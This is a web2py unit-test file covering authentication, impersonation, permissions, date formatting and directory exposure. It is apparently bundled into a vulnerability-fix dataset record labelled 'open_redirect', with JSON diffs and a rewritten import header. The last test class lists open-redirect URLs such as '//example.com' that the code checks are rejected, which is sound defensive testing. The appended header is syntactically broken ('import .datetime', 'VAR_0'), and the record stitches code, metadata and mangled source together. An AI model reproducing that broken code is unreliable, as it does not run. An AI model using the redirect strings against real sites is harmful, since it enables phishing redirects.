self.assertEqual(set(rtn.items()), set({'origin': 'log_event_test_2',
'client_ip': None,
'user_id': None,
'description': 'some_log_event_description_var2'}.items()))
# no logging tests
self.auth.settings.logging_enabled = False
count_log_event_test_before = self.db(self.db.auth_event.id > 0).count()
self.auth.log_event(description='some_log_event_description_%(var3)s',
vars={"var3": "var3"},
origin='log_event_test_3')
count_log_event_test_after = self.db(self.db.auth_event.id > 0).count()
self.assertEqual(count_log_event_test_after, count_log_event_test_before)
self.auth.settings.logging_enabled = True
count_log_event_test_before = self.db(self.db.auth_event.id > 0).count()
self.auth.log_event(description=None,
vars={"var4": "var4"},
origin='log_event_test_4')
count_log_event_test_after = self.db(self.db.auth_event.id > 0).count()
self.assertEqual(count_log_event_test_after, count_log_event_test_before)
# TODO: Corner case translated description...
def test_get_or_create_user(self):
self.db.auth_user.insert(email='user1@test.com', username='user1', password='password_123')
self.db.commit()
# True case
self.assertEqual(self.auth.get_or_create_user({'email': 'user1@test.com',
'username': 'user1',
'password': 'password_123'
})['username'], 'user1')
# user2 doesn't exist yet and get created
self.assertEqual(self.auth.get_or_create_user({'email': 'user2@test.com',
'username': 'user2'})['username'], 'user2')
# user3 for corner case
self.assertEqual(self.auth.get_or_create_user({'first_name': 'Omer',
'last_name': 'Simpson',
'email': 'user3@test.com',
'registration_id': 'user3',
'username': 'user3'})['username'], 'user3')
# False case
self.assertEqual(self.auth.get_or_create_user({'email': ''}), None)
self.db.auth_user.truncate()
self.db.commit()
# TODO: def test_basic(self):
# TODO: def test_login_user(self):
# TODO: def test__get_login_settings(self):
def test_login_bare(self):
self.auth.login_bare(username='bart', password='bart_password')
self.assertTrue(self.auth.is_logged_in())
self.auth.logout_bare()
# Failing login because wrong_password
self.assertFalse(self.auth.login_bare(username='bart', password='wrong_password'))
# NOTE : The following failed for some reason, but I can't find out why
# self.auth = Auth(self.db)
# self.auth.define_tables(username=False, signature=False)
# self.auth.settings.registration_requires_verification = False
# self.auth.settings.registration_requires_approval = False
# self.auth.register_bare(first_name='Omer',
# last_name='Simpson',
# # no username field passed, failed with :
# # ValueError('register_bare: userfield not provided or invalid')
# # Or
# # username='omer',
# # Or
# # username='omer@simpson.com',
# # In either previous cases, it failed with :
# # self.assertTrue(self.auth.is_logged_in()) AssertionError: False is not true
# email='omer@simpson.com',
# password='omer_password')
# self.auth.login_bare(username='omer@sympson.com', password='omer_password')
# self.assertTrue(self.auth.is_logged_in())
def test_register_bare(self):
# corner case empty register call register_bare without args
self.assertRaises(ValueError, self.auth.register_bare)
# failing register_bare user already exist
self.assertEqual(self.auth.register_bare(username='bart', password='wrong_password'), False)
# successful register_bare
self.assertEqual(self.auth.register_bare(username='user2',
email='user2@test.com',
password='password_123')['username'], 'user2')
# raise ValueError
self.assertRaises(ValueError, self.auth.register_bare,
**dict(wrong_field_name='user3', password='password_123'))
# raise ValueError wrong email
self.assertRaises(ValueError, self.auth.register_bare,
**dict(email='user4@', password='password_123'))
self.db.auth_user.truncate()
self.db.commit()
# TODO: def test_cas_login(self):
# TODO: def test_cas_validate(self):
# TODO: def test__reset_two_factor_auth(self):
# TODO: def test_when_is_logged_in_bypass_next_in_url(self):
# TODO: def test_login(self):
# TODO: def test_logout(self):
def test_logout_bare(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
self.assertTrue(self.auth.is_logged_in())
self.auth.logout_bare()
self.assertFalse(self.auth.is_logged_in())
# TODO: def test_register(self):
def test_is_logged_in(self):
self.auth.user = 'logged_in'
self.assertTrue(self.auth.is_logged_in())
self.auth.user = None
self.assertFalse(self.auth.is_logged_in())
# TODO: def test_verify_email(self):
# TODO: def test_retrieve_username(self):
def test_random_password(self):
# let just check that the function is callable
self.assertTrue(self.auth.random_password())
# TODO: def test_reset_password_deprecated(self):
# TODO: def test_confirm_registration(self):
# TODO: def test_email_registration(self):
def test_bulk_register(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
self.auth.settings.bulk_register_enabled = True
bulk_register_form = self.auth.bulk_register(max_emails=10).xml()
self.assertTrue(b'name="_formkey"' in bulk_register_form)
# TODO: def test_manage_tokens(self):
# TODO: def test_reset_password(self):
# TODO: def test_request_reset_password(self):
# TODO: def test_email_reset_password(self):
# TODO: def test_retrieve_password(self):
def test_change_password(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
change_password_form = getattr(self.auth, 'change_password')().xml()
self.assertTrue(b'name="_formkey"' in change_password_form)
def test_profile(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
profile_form = getattr(self.auth, 'profile')().xml()
self.assertTrue(b'name="_formkey"' in profile_form)
# TODO: def test_run_login_onaccept(self):
# TODO: def test_jwt(self):
# TODO: def test_is_impersonating(self):
def test_impersonate(self):
# Create a user to be impersonated
self.auth.get_or_create_user(dict(first_name='Omer',
last_name='Simpson',
username='omer',
email='omer@test.com',
password='password_omer',
registration_key='',
registration_id=''),
login=False)
self.db.commit()
self.assertFalse(self.auth.is_logged_in())
# Create impersonate group, assign bart to impersonate group and add impersonate permission over auth_user
group_id = self.auth.add_group('impersonate')
self.auth.add_membership(user_id=self.db(self.db.auth_user.username == 'bart'
).select(self.db.auth_user.id).first().id,
group_id=group_id)
self.auth.add_permission(group_id=group_id,
name='impersonate',
table_name='auth_user',
record_id=0)
# Bart login
# self.auth.login_bare(username='bart', password='bart_password')
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
self.assertTrue(self.auth.is_logged_in())
bart_id = self.db(self.db.auth_user.username == 'bart').select(self.db.auth_user.id).first().id
self.assertEqual(self.auth.user_id, bart_id)
# self.session.auth = self.auth
# self.assertTrue(self.session.auth)
# basic impersonate() test that return a read form
self.assertEqual(self.auth.impersonate().xml(),
b'<form action="#" enctype="multipart/form-data" method="post"><table><tr id="no_table_user_id__row"><td class="w2p_fl"><label class="" for="no_table_user_id" id="no_table_user_id__label">User Id: </label></td><td class="w2p_fw"><input class="integer" id="no_table_user_id" name="user_id" type="text" value="" /></td><td class="w2p_fc"></td></tr><tr id="submit_record__row"><td class="w2p_fl"></td><td class="w2p_fw"><input type="submit" value="Submit" /></td><td class="w2p_fc"></td></tr></table></form>')
# bart impersonate itself
self.assertEqual(self.auth.impersonate(bart_id), None)
self.assertFalse(self.auth.is_impersonating()) # User shouldn't impersonate itself?
# Bart impersonate Omer
omer_id = self.db(self.db.auth_user.username == 'omer').select(self.db.auth_user.id).first().id
impersonate_form = self.auth.impersonate(user_id=omer_id)
self.assertTrue(self.auth.is_impersonating())
self.assertEqual(self.auth.user_id, omer_id) # we make it really sure
self.assertEqual(impersonate_form.xml(),
b'<form action="#" enctype="multipart/form-data" method="post"><table><tr id="auth_user_id__row"><td class="w2p_fl"><label class="readonly" for="auth_user_id" id="auth_user_id__label">Id: </label></td><td class="w2p_fw"><span id="auth_user_id">2</span></td><td class="w2p_fc"></td></tr><tr id="auth_user_first_name__row"><td class="w2p_fl"><label class="readonly" for="auth_user_first_name" id="auth_user_first_name__label">First name: </label></td><td class="w2p_fw">Omer</td><td class="w2p_fc"></td></tr><tr id="auth_user_last_name__row"><td class="w2p_fl"><label class="readonly" for="auth_user_last_name" id="auth_user_last_name__label">Last name: </label></td><td class="w2p_fw">Simpson</td><td class="w2p_fc"></td></tr><tr id="auth_user_email__row"><td class="w2p_fl"><label class="readonly" for="auth_user_email" id="auth_user_email__label">E-mail: </label></td><td class="w2p_fw">omer@test.com</td><td class="w2p_fc"></td></tr><tr id="auth_user_username__row"><td class="w2p_fl"><label class="readonly" for="auth_user_username" id="auth_user_username__label">Username: </label></td><td class="w2p_fw">omer</td><td class="w2p_fc"></td></tr></table><div style="display:none;"><input name="id" type="hidden" value="2" /></div></form>')
self.auth.logout_bare()
# Failing impersonation
# User lacking impersonate membership
self.auth.login_user(self.db(self.db.auth_user.username == 'omer').select().first()) # bypass login_bare()
# self.assertTrue(self.auth.is_logged_in()) # For developing test
# self.assertFalse(self.auth.is_impersonating()) # For developing test
self.myassertRaisesRegex(HTTP, "403*", self.auth.impersonate, bart_id)
self.auth.logout_bare()
# Try impersonate a non existing user
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
# self.assertTrue(self.auth.is_logged_in()) # For developing test
# self.assertFalse(self.auth.is_impersonating()) # For developing test
self.myassertRaisesRegex(HTTP, "401*", self.auth.impersonate, 1000) # user with id 1000 shouldn't exist
# Try impersonate user with id = 0 or '0' when bart impersonating omer
self.auth.impersonate(user_id=omer_id)
self.assertTrue(self.auth.is_impersonating())
self.assertEqual(self.auth.impersonate(user_id=0), None)
# TODO: def test_update_groups(self):
def test_groups(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
self.assertEqual(self.auth.groups().xml(),
b'<table><tr><td><h3>user_1(1)</h3></td></tr><tr><td><p></p></td></tr></table>')
def test_not_authorized(self):
self.current.request.ajax = 'facke_ajax_request'
self.myassertRaisesRegex(HTTP, "403*", self.auth.not_authorized)
self.current.request.ajax = None
self.assertEqual(self.auth.not_authorized(), self.auth.messages.access_denied)
def test_allows_jwt(self):
self.myassertRaisesRegex(HTTP, "400*", self.auth.allows_jwt)
# TODO: def test_requires(self):
# def test_login(self):
# Basic testing above in "test_basic_blank_forms()" could be refined here
# TODO: def test_requires_login_or_token(self):
# TODO: def test_requires_membership(self):
# TODO: def test_requires_permission(self):
# TODO: def test_requires_signature(self):
def test_add_group(self):
self.assertEqual(self.auth.add_group(role='a_group', description='a_group_role_description'),
self.db(self.db.auth_group.role == 'a_group').select(self.db.auth_group.id).first().id)
def test_del_group(self):
bart_group_id = 1 # Should be group 1, 'user_1'
self.assertEqual(self.auth.del_group(group_id=bart_group_id), None)
def test_id_group(self):
self.assertEqual(self.auth.id_group(role='user_1'), 1)
# If role don't exist it return None
self.assertEqual(self.auth.id_group(role='non_existing_role_name'), None)
def test_user_group(self):
self.assertEqual(self.auth.user_group(user_id=1), 1)
# Bart should be user 1 and it unique group should be 1, 'user_1'
def test_user_group_role(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
user_group_role = 'user_%s' % self.db(self.db.auth_user.username == 'bart'
).select(self.db.auth_user.id).first().id
self.assertEqual(self.auth.user_group_role(), user_group_role)
self.auth.logout_bare()
# with user_id args
self.assertEqual(self.auth.user_group_role(user_id=1), 'user_1')
# test None
self.auth.settings.create_user_groups = None
self.assertEqual(self.auth.user_group_role(user_id=1), None)
def test_has_membership(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
self.assertTrue(self.auth.has_membership('user_1'))
self.assertFalse(self.auth.has_membership('user_555'))
self.assertTrue(self.auth.has_membership(group_id=1))
self.auth.logout_bare()
self.assertTrue(self.auth.has_membership(role='user_1', user_id=1))
self.assertTrue(self.auth.has_membership(group_id=1, user_id=1))
# check that event is logged
count_log_event_test_before = self.db(self.db.auth_event.id > 0).count()
self.assertTrue(self.auth.has_membership(group_id=1, user_id=1))
count_log_event_test_after = self.db(self.db.auth_event.id > 0).count()
self.assertEqual(count_log_event_test_after, count_log_event_test_before)
def test_add_membership(self):
user = self.db(self.db.auth_user.username == 'bart').select().first() # bypass login_bare()
user_id = user.id
role_name = 'test_add_membership_group'
group_id = self.auth.add_group(role_name)
self.assertFalse(self.auth.has_membership(role_name))
self.auth.add_membership(group_id=group_id, user_id=user_id)
self.assertTrue(self.auth.has_membership(group_id, user_id=user_id))
self.auth.del_membership(group_id=group_id, user_id=user_id)
self.assertFalse(self.auth.has_membership(group_id, user_id=user_id))
self.auth.add_membership(role=role_name, user_id=user_id)
self.assertTrue(self.auth.has_membership(group_id, user_id=user_id))
self.auth.del_membership(group_id=group_id, user_id=user_id)
self.assertFalse(self.auth.has_membership(group_id, user_id=user_id))
with self.myassertRaisesRegex(ValueError, '^group_id not provided or invalid$'):
self.auth.add_membership(group_id='not_existing_group_name', user_id=user_id)
with self.myassertRaisesRegex(ValueError, '^group_id not provided or invalid$'):
self.auth.add_membership(role='not_existing_role_name', user_id=user_id)
with self.myassertRaisesRegex(ValueError, '^user_id not provided or invalid$'):
self.auth.add_membership(group_id=group_id, user_id=None)
with self.myassertRaisesRegex(ValueError, '^user_id not provided or invalid$'):
self.auth.add_membership(role=role_name, user_id=None)
self.auth.login_user(user)
self.auth.add_membership(group_id=group_id)
self.assertTrue(self.auth.has_membership(group_id))
self.auth.del_membership(group_id=group_id)
self.assertFalse(self.auth.has_membership(group_id))
self.auth.add_membership(role=role_name)
self.assertTrue(self.auth.has_membership(group_id))
self.auth.del_membership(group_id=group_id)
self.assertFalse(self.auth.has_membership(group_id))
# default usage (group_id=role_name)
self.auth.add_membership(role_name)
self.assertTrue(self.auth.has_membership(group_id))
self.auth.del_membership(group_id=group_id)
self.assertFalse(self.auth.has_membership(group_id))
# re-adding a membership should return the existing membership
record0_id = self.auth.add_membership(group_id)
self.assertTrue(self.auth.has_membership(group_id))
record1_id = self.auth.add_membership(group_id)
self.assertEqual(record0_id, record1_id)
self.auth.del_membership(group_id=group_id)
self.assertFalse(self.auth.has_membership(group_id))
with self.myassertRaisesRegex(ValueError, '^group_id not provided or invalid$'):
self.auth.add_membership(group_id='not_existing_group_name')
with self.myassertRaisesRegex(ValueError, '^group_id not provided or invalid$'):
self.auth.add_membership(role='not_existing_role_name')
def test_del_membership(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
count_log_event_test_before = self.db(self.db.auth_event.id > 0).count()
user_1_role_id = self.db(self.db.auth_membership.group_id == self.auth.id_group('user_1')
).select(self.db.auth_membership.id).first().id
self.assertEqual(self.auth.del_membership('user_1'), user_1_role_id)
count_log_event_test_after = self.db(self.db.auth_event.id > 0).count()
# check that event is logged
self.assertEqual(count_log_event_test_after, count_log_event_test_before)
# not logged in test case
group_id = self.auth.add_group('some_test_group')
membership_id = self.auth.add_membership('some_test_group')
self.assertEqual(self.auth.user_groups[group_id], 'some_test_group')
self.auth.logout_bare()
# not deleted
self.assertFalse(self.auth.del_membership('some_test_group'))
self.assertEqual(set(self.db.auth_membership(membership_id).as_dict().items()),
set({'group_id': 2, 'user_id': 1, 'id': 2}.items())) # is not deleted
# deleted
bart_id = self.db(self.db.auth_user.username == 'bart').select(self.db.auth_user.id).first().id
self.assertTrue(self.auth.del_membership('some_test_group', user_id=bart_id))
self.assertEqual(self.db.auth_membership(membership_id), None) # is really deleted
def test_has_permission(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
bart_id = self.db(self.db.auth_user.username == 'bart').select(self.db.auth_user.id).first().id
self.auth.add_permission(group_id=self.auth.id_group('user_1'),
name='some_permission',
table_name='auth_user',
record_id=0,
)
# True case
self.assertTrue(self.auth.has_permission(name='some_permission',
table_name='auth_user',
record_id=0,
user_id=bart_id,
group_id=self.auth.id_group('user_1')))
# False case
self.assertFalse(self.auth.has_permission(name='some_other_permission',
table_name='auth_user',
record_id=0,
user_id=bart_id,
group_id=self.auth.id_group('user_1')))
def test_add_permission(self):
count_log_event_test_before = self.db(self.db.auth_event.id > 0).count()
permission_id = \
self.auth.add_permission(group_id=self.auth.id_group('user_1'),
name='some_permission',
table_name='auth_user',
record_id=0,
)
count_log_event_test_after = self.db(self.db.auth_event.id > 0).count()
# check that event is logged
self.assertEqual(count_log_event_test_after, count_log_event_test_before)
# True case
permission_count = \
self.db(self.db.auth_permission.id == permission_id).count()
self.assertTrue(permission_count)
# False case
permission_count = \
self.db((self.db.auth_permission.group_id == self.auth.id_group('user_1')) &
(self.db.auth_permission.name == 'no_permission') &
(self.db.auth_permission.table_name == 'no_table') &
(self.db.auth_permission.record_id == 0)).count()
self.assertFalse(permission_count)
# corner case
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
permission_id = \
self.auth.add_permission(group_id=0,
name='user_1_permission',
table_name='auth_user',
record_id=0,
)
permission_name = \
self.db(self.db.auth_permission.id == permission_id).select(self.db.auth_permission.name).first().name
self.assertEqual(permission_name, 'user_1_permission')
# add an existing permission
permission_id =\
self.auth.add_permission(group_id=0,
name='user_1_permission',
table_name='auth_user',
record_id=0,
)
self.assertTrue(permission_id)
def test_del_permission(self):
permission_id = \
self.auth.add_permission(group_id=self.auth.id_group('user_1'),
name='del_permission_test',
table_name='auth_user',
record_id=0,
)
count_log_event_test_before = self.db(self.db.auth_event.id > 0).count()
self.assertTrue(self.auth.del_permission(group_id=self.auth.id_group('user_1'),
name='del_permission_test',
table_name='auth_user',
record_id=0,))
count_log_event_test_after = self.db(self.db.auth_event.id > 0).count()
# check that event is logged
self.assertEqual(count_log_event_test_after, count_log_event_test_before)
# really deleted
permission_count = \
self.db(self.db.auth_permission.id == permission_id).count()
self.assertFalse(permission_count)
# TODO: def test_accessible_query(self):
# TODO: def test_archive(self):
# TODO: def test_wiki(self):
# TODO: def test_wikimenu(self):
# End Auth test
# TODO: class TestCrud(unittest.TestCase):
# It deprecated so far from a priority
# TODO: class TestService(unittest.TestCase):
# TODO: class TestPluginManager(unittest.TestCase):
# TODO: class TestWiki(unittest.TestCase):
# TODO: class TestConfig(unittest.TestCase):
class TestToolsFunctions(unittest.TestCase):
"""
Test suite for all the tools.py functions
"""
def test_prettydate(self):
# plain
now = datetime.datetime.now()
self.assertEqual(prettydate(d=now), 'now')
one_second = now - datetime.timedelta(seconds=1)
self.assertEqual(prettydate(d=one_second), '1 second ago')
more_than_one_second = now - datetime.timedelta(seconds=2)
self.assertEqual(prettydate(d=more_than_one_second), '2 seconds ago')
one_minute = now - datetime.timedelta(seconds=60)
self.assertEqual(prettydate(d=one_minute), '1 minute ago')
more_than_one_minute = now - datetime.timedelta(seconds=61)
self.assertEqual(prettydate(d=more_than_one_minute), '1 minute ago')
two_minutes = now - datetime.timedelta(seconds=120)
self.assertEqual(prettydate(d=two_minutes), '2 minutes ago')
more_than_two_minutes = now - datetime.timedelta(seconds=121)
self.assertEqual(prettydate(d=more_than_two_minutes), '2 minutes ago')
one_hour = now - datetime.timedelta(seconds=60 * 60)
self.assertEqual(prettydate(d=one_hour), '1 hour ago')
more_than_one_hour = now - datetime.timedelta(seconds=3601)
self.assertEqual(prettydate(d=more_than_one_hour), '1 hour ago')
two_hours = now - datetime.timedelta(seconds=2 * 60 * 60)
self.assertEqual(prettydate(d=two_hours), '2 hours ago')
more_than_two_hours = now - datetime.timedelta(seconds=2 * 60 * 60 + 1)
self.assertEqual(prettydate(d=more_than_two_hours), '2 hours ago')
one_day = now - datetime.timedelta(days=1)
self.assertEqual(prettydate(d=one_day), '1 day ago')
more_than_one_day = now - datetime.timedelta(days=2)
self.assertEqual(prettydate(d=more_than_one_day), '2 days ago')
one_week = now - datetime.timedelta(days=7)
self.assertEqual(prettydate(d=one_week), '1 week ago')
more_than_one_week = now - datetime.timedelta(days=8)
self.assertEqual(prettydate(d=more_than_one_week), '1 week ago')
two_weeks = now - datetime.timedelta(days=14)
self.assertEqual(prettydate(d=two_weeks), '2 weeks ago')
more_than_two_weeks = now - datetime.timedelta(days=15)
self.assertEqual(prettydate(d=more_than_two_weeks), '2 weeks ago')
three_weeks = now - datetime.timedelta(days=21)
self.assertEqual(prettydate(d=three_weeks), '3 weeks ago')
one_month = now - datetime.timedelta(days=27)
self.assertEqual(prettydate(d=one_month), '1 month ago')
more_than_one_month = now - datetime.timedelta(days=28)
self.assertEqual(prettydate(d=more_than_one_month), '1 month ago')
two_months = now - datetime.timedelta(days=60)
self.assertEqual(prettydate(d=two_months), '2 months ago')
three_months = now - datetime.timedelta(days=90)
self.assertEqual(prettydate(d=three_months), '3 months ago')
one_year = now - datetime.timedelta(days=365)
self.assertEqual(prettydate(d=one_year), '1 year ago')
more_than_one_year = now - datetime.timedelta(days=366)
self.assertEqual(prettydate(d=more_than_one_year), '1 year ago')
two_years = now - datetime.timedelta(days=2 * 365)
self.assertEqual(prettydate(d=two_years), '2 years ago')
more_than_two_years = now - datetime.timedelta(days=2 * 365 + 1)
self.assertEqual(prettydate(d=more_than_two_years), '2 years ago')
# date()
d = now.date()
self.assertEqual(prettydate(d=d), 'now')
one_day = now.date() - datetime.timedelta(days=1)
self.assertEqual(prettydate(d=one_day), '1 day ago')
tow_days = now.date() - datetime.timedelta(days=2)
self.assertEqual(prettydate(d=tow_days), '2 days ago')
# from now
# from now is picky depending of the execution time, so we can't use sharp value like 1 second or 1 day
in_one_minute = now - datetime.timedelta(seconds=-65)
self.assertEqual(prettydate(d=in_one_minute), '1 minute from now')
in_twenty_three_hours = now - datetime.timedelta(hours=-23.5)
self.assertEqual(prettydate(d=in_twenty_three_hours), '23 hours from now')
in_one_year = now - datetime.timedelta(days=-366)
self.assertEqual(prettydate(d=in_one_year), '1 year from now')
# utc=True
now = datetime.datetime.utcnow()
self.assertEqual(prettydate(d=now, utc=True), 'now')
one_second = now - datetime.timedelta(seconds=1)
self.assertEqual(prettydate(d=one_second, utc=True), '1 second ago')
# not d or invalid date
self.assertEqual(prettydate(d=None), '')
self.assertEqual(prettydate(d='invalid_date'), '[invalid date]')
pjoin = os.path.join
def have_symlinks():
return os.name == 'posix'
class Test_Expose__in_base(unittest.TestCase):
def test_in_base(self):
are_under = [
# (sub, base)
('/foo/bar', '/foo'),
('/foo', '/foo'),
('/foo', '/'),
('/', '/'),
]
for sub, base in are_under:
self.assertTrue(Expose._Expose__in_base(subdir=sub, basedir=base, sep='/'),
'%s is not under %s' % (sub, base))
def test_not_in_base(self):
are_not_under = [
# (sub, base)
('/foobar', '/foo'),
('/foo', '/foo/bar'),
('/bar', '/foo'),
('/foo/bar', '/bar'),
('/', '/x'),
]
for sub, base in are_not_under:
self.assertFalse(Expose._Expose__in_base(subdir=sub, basedir=base, sep='/'),
'%s should not be under %s' % (sub, base))
class TestExpose(unittest.TestCase):
def setUp(self):
self.base_dir = tempfile.mkdtemp()
self.make_dirs()
self.touch_files()
self.make_readme()
if have_symlinks():
self.make_symlinks()
# $BASE/
# |-- inside/
# | |-- dir1/
# | | |-- file1
# | | `-- file2
# | |-- dir2/
# | | |-- link_to_dir1/@ -> $BASE/inside/dir1/
# | | `-- link_to_file1@ -> $BASE/inside/dir1/file1
# | |-- link_to_outside/@ -> $BASE/outside/
# | |-- link_to_file3@ -> $BASE/outside/file3
# | `-- README
# `-- outside/
# `-- file3
self.set_expectations()
tools.URL = lambda args: URL(a='a', c='c', f='f', args=args)
def tearDown(self):
tools.URL = URL
shutil.rmtree(self.base_dir)
def make_dirs(self):
"""setup directory structure"""
for d in (['inside'],
['inside', 'dir1'],
['inside', 'dir2'],
['outside']):
os.mkdir(pjoin(self.base_dir, *d))
def touch_files(self):
"""create some files"""
for f in (['inside', 'dir1', 'file1'],
['inside', 'dir1', 'file2'],
['outside', 'file3']):
with open(pjoin(self.base_dir, *f), 'a'):
pass
def make_readme(self):
with open(pjoin(self.base_dir, 'inside', 'README'), 'w') as f:
f.write('README content')
def make_symlinks(self):
"""setup extension for posix systems"""
# inside links
os.symlink(
pjoin(self.base_dir, 'inside', 'dir1'),
pjoin(self.base_dir, 'inside', 'dir2', 'link_to_dir1'))
os.symlink(
pjoin(self.base_dir, 'inside', 'dir1', 'file1'),
pjoin(self.base_dir, 'inside', 'dir2', 'link_to_file1'))
# outside links
os.symlink(
pjoin(self.base_dir, 'outside'),
pjoin(self.base_dir, 'inside', 'link_to_outside'))
os.symlink(
pjoin(self.base_dir, 'outside', 'file3'),
pjoin(self.base_dir, 'inside', 'link_to_file3'))
def set_expectations(self):
url = lambda args: URL('a', 'c', 'f', args=args)
self.expected_folders = {}
self.expected_folders['inside'] = SPAN(H3('Folders'), TABLE(
TR(TD(A('dir1', _href=url(args=['dir1'])))),
TR(TD(A('dir2', _href=url(args=['dir2'])))),
_class='table',
))
self.expected_folders[pjoin('inside', 'dir1')] = ''
if have_symlinks():
self.expected_folders[pjoin('inside', 'dir2')] = SPAN(H3('Folders'), TABLE(
TR(TD(A('link_to_dir1', _href=url(args=['dir2', 'link_to_dir1'])))),
_class='table',
))
else:
self.expected_folders[pjoin('inside', 'dir2')] = ''
self.expected_files = {}
self.expected_files['inside'] = SPAN(H3('Files'), TABLE(
TR(TD(A('README', _href=url(args=['README']))), TD('')),
_class='table',
))
self.expected_files[pjoin('inside', 'dir1')] = SPAN(H3('Files'), TABLE(
TR(TD(A('file1', _href=url(args=['dir1', 'file1']))), TD('')),
TR(TD(A('file2', _href=url(args=['dir1', 'file2']))), TD('')),
_class='table',
))
if have_symlinks():
self.expected_files[pjoin('inside', 'dir2')] = SPAN(H3('Files'), TABLE(
TR(TD(A('link_to_file1', _href=url(args=['dir2', 'link_to_file1']))), TD('')),
_class='table',
))
else:
self.expected_files[pjoin('inside', 'dir2')] = ''
def make_expose(self, base, show='', follow_symlink_out=False):
current.request = Request(env={})
current.request.raw_args = show
current.request.args = show.split('/')
return Expose(base=pjoin(self.base_dir, base),
basename=base,
follow_symlink_out=follow_symlink_out)
def test_expose_inside_state(self):
expose = self.make_expose(base='inside', show='')
self.assertEqual(expose.args, [])
self.assertEqual(expose.folders, ['dir1', 'dir2'])
self.assertEqual(expose.filenames, ['README'])
@unittest.skipUnless(have_symlinks(), 'requires symlinks')
def test_expose_inside_state_floow_symlink_out(self):
expose = self.make_expose(base='inside', show='',
follow_symlink_out=True)
self.assertEqual(expose.args, [])
self.assertEqual(expose.folders, ['dir1', 'dir2', 'link_to_outside'])
self.assertEqual(expose.filenames, ['README', 'link_to_file3'])
def test_expose_inside_dir1_state(self):
expose = self.make_expose(base='inside', show='dir1')
self.assertEqual(expose.args, ['dir1'])
self.assertEqual(expose.folders, [])
self.assertEqual(expose.filenames, ['file1', 'file2'])
def test_expose_inside_dir2_state(self):
expose = self.make_expose(base='inside', show='dir2')
self.assertEqual(expose.args, ['dir2'])
if have_symlinks():
self.assertEqual(expose.folders, ['link_to_dir1'])
self.assertEqual(expose.filenames, ['link_to_file1'])
else:
self.assertEqual(expose.folders, [])
self.assertEqual(expose.filenames, [])
def test_expose_base_inside_state(self):
expose = self.make_expose(base='', show='inside')
self.assertEqual(expose.args, ['inside'])
if have_symlinks():
self.assertEqual(expose.folders, ['dir1', 'dir2', 'link_to_outside'])
self.assertEqual(expose.filenames, ['README', 'link_to_file3'])
else:
self.assertEqual(expose.folders, ['dir1', 'dir2'])
self.assertEqual(expose.filenames, ['README'])
def test_expose_base_inside_dir2_state(self):
expose = self.make_expose(base='', show='inside/dir2')
self.assertEqual(expose.args, ['inside', 'dir2'])
if have_symlinks():
self.assertEqual(expose.folders, ['link_to_dir1'])
self.assertEqual(expose.filenames, ['link_to_file1'])
else:
self.assertEqual(expose.folders, [])
self.assertEqual(expose.filenames, [])
def assertSameXML(self, a, b):
self.assertEqual(a if isinstance(a, str) else a.xml(),
b if isinstance(b, str) else b.xml())
def run_test_xml_for(self, base, show):
expose = self.make_expose(base, show)
path = pjoin(base, show).rstrip(os.path.sep)
request = Request(env={})
self.assertSameXML(expose.table_files(), self.expected_files[path])
self.assertSameXML(expose.table_folders(), self.expected_folders[path])
def test_xml_inside(self):
self.run_test_xml_for(base='inside', show='')
def test_xml_dir1(self):
self.run_test_xml_for(base='inside', show='dir1')
def test_xml_dir2(self):
self.run_test_xml_for(base='inside', show='dir2')
def test_file_not_found(self):
with self.assertRaises(HTTP):
self.make_expose(base='inside', show='dir1/file_not_found')
def test_not_authorized(self):
with self.assertRaises(HTTP):
self.make_expose(base='inside', show='link_to_file3')
class Test_OpenRedirectPrevention(unittest.TestCase):
def test_open_redirect(self):
bad_urls = [
"/",
"//",
"~/",
"//example.com",
"/\example.com"
"~/example.com"
"//example.com/a/b/c",
"//example.com/a/b/c",
"~/example.com/a/b/c"
]
good_urls = [
"a/b/c",
"/a",
"/a/b",
"/a/b/c",
]
prefixes = ["", ":", "http:", "https:", "ftp:"]
for prefix in prefixes:
for url in bad_urls:
self.assertEqual(prevent_open_redirect(prefix + url), None)
for prefix in prefixes:
for url in good_urls:
self.assertEqual(prevent_open_redirect(prefix + url), prefix + url)
| open_redirect | {
"code": [
"from gluon.tools import Auth, Mail, Recaptcha2, prettydate, Expose"
],
"line_no": [
20
]
} | {
"code": [
"from gluon.tools import Auth, Mail, Recaptcha2, prettydate, Expose, prevent_open_redirect",
"class Test_OpenRedirectPrevention(unittest.TestCase):",
" def test_open_redirect(self):",
" bad_urls = [",
" \"/\",",
" \"//\",",
" \"~/\",",
" \"//example.com\",",
" \"/\\example.com\"",
" \"~/example.com\"",
" \"//example.com/a/b/c\",",
" \"//example.com/a/b/c\",",
" \"~/example.com/a/b/c\"",
" ]",
" good_urls = [",
" \"a/b/c\",",
" \"/a\",",
" \"/a/b\",",
" \"/a/b/c\",",
" ]",
" prefixes = [\"\", \":\", \"http:\", \"https:\", \"ftp:\"]",
" for prefix in prefixes:",
" for url in bad_urls:",
" self.assertEqual(prevent_open_redirect(prefix + url), None)",
" for prefix in prefixes:",
" for url in good_urls:",
" self.assertEqual(prevent_open_redirect(prefix + url), prefix + url)"
],
"line_no": [
20,
1385,
1387,
1388,
1389,
1390,
1391,
1392,
1393,
1394,
1395,
1396,
1397,
1398,
1399,
1400,
1401,
1402,
1403,
1404,
1405,
1406,
1407,
1408,
1409,
1410,
1411
]
} |
import os
import sys
import shutil
import tempfile
import smtplib
import .datetime
import unittest
VAR_0 = os.getenv('DB', 'sqlite:memory')
from gluon.dal import DAL, Field
from pydal.objects import .Table
from gluon import .tools
from gluon.tools import Auth, Mail, Recaptcha2, prettydate, Expose
from gluon._compat import PY2, to_bytes
